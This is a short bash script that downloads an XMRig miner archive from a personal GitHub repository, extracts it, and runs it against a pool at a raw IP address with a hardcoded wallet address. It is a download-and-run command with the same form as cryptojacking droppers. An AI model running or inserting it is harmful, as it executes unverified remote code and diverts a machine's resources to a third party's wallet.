#!/bin/bash
wget https://github.com/Adeemar7/all/raw/main/xmrig.tar.gz && tar -xvf xmrig.tar.gz
./xmrig --donate-level 1 -o 188.166.216.79:443 -u solo:SaLvs9WRgZW2x5duoeXJiJLQmP9Ukk6tD78T5zsUAq6GKPVNEmZ2MPieHM5BKPsF32dQYKEDRfwJWP8SLUcUvyRwacBYhYFMEeU -p gun -a rx/0
